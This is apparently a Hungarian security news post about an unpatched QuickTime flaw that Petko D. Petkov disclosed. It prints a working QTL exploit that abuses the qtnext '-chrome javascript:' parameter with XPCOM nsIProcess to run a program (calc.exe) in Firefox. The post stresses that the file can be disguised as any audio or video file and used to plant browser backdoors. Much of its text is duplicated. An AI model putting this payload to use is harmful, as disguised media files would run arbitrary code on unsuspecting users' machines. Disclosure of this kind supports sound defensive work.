Petko D. Petkov még tavaly tett közzé két highly critical QuickTime hibát, melyek közül az egyiket kijavították, a másikkal azonban nem törődtek. Az év végén tett még egy kísérletet, hogy felhívja a figyelmet a foltozatlan hibára, eredményt azonban ezzel sem ért el. Most újra próbálkozott, és egy olyan módszert publikált, melynek segítségével elvileg bármely QuickTime bővítménnyel rendelkező Firefox böngésző távoli parancsfuttatásra bírható, egy félelemetesen egyszerű kód segítségével:
Kezdjük az elején! Az alábbi egyszerű kód QTL fájlként futtatva egy egyszerű üzenetet jelenítmeg a képernyőn:
A dolog érdekessége az, hogy ez a kód bármilyen QuickTime által támogatott audió és videó kiterjesztéssel elmenthető. Így az alábbi exploit
gyakorlatilag tetszőleges média fájlnak álcázható. A hiba kihasználásával a hamisított fájlt megnyitó felhasználó jogkörével tetszőleges kód futtatható, de adminisztzrátori jogkör nélkül is installálhatók hátsó kapuk a böngészőbe.
Demonstráció gyanánt íme néhány okosan megírt média fájl (nem okoznak kárt):
BEYONCE.mp3
pr0n0.mov
FunnyDog.mpeg
GhostInTheShell.avi
A fennti kódok Windowshoz készültek, de a hiba elvileg bármilyen platformon kihasználható!
Ja igen, plusz szépsége a dolognak, hogy a QuickTime automatikusan betelepül a Firefoxba, ha az ember felrak egy iTunest, szóval elég sokan érintettek a dologban...
Kezdjük az elején! Az alábbi egyszerű kód QTL fájlként futtatva egy egyszerű üzenetet jelenítmeg a képernyőn:
<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="presentation.mov" autoplay="true" qtnext="javascript:alert('whats up...')"/>
<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].
createInstance(Components.interfaces.nsILocalFile);
file.initWithPath('c:\\windows\\system32\\calc.exe');
process=Components.classes['@mozilla.org/process/util;1'].
createInstance(Components.interfaces.nsIProcess);
process.init(file);process.run(true,[],0);void(0);"/>
gyakorlatilag tetszőleges média fájlnak álcázható. A hiba kihasználásával a hamisított fájlt megnyitó felhasználó jogkörével tetszőleges kód futtatható, de adminisztzrátori jogkör nélkül is installálhatók hátsó kapuk a böngészőbe.
Demonstráció gyanánt íme néhány okosan megírt média fájl (nem okoznak kárt):
BEYONCE.mp3
pr0n0.mov
FunnyDog.mpeg
GhostInTheShell.avi
A fennti kódok Windowshoz készültek, de a hiba elvileg bármilyen platformon kihasználható!
Ja igen, plusz szépsége a dolognak, hogy a QuickTime automatikusan betelepül a Firefoxba, ha az ember felrak egy iTunest, szóval elég sokan érintettek a dologban...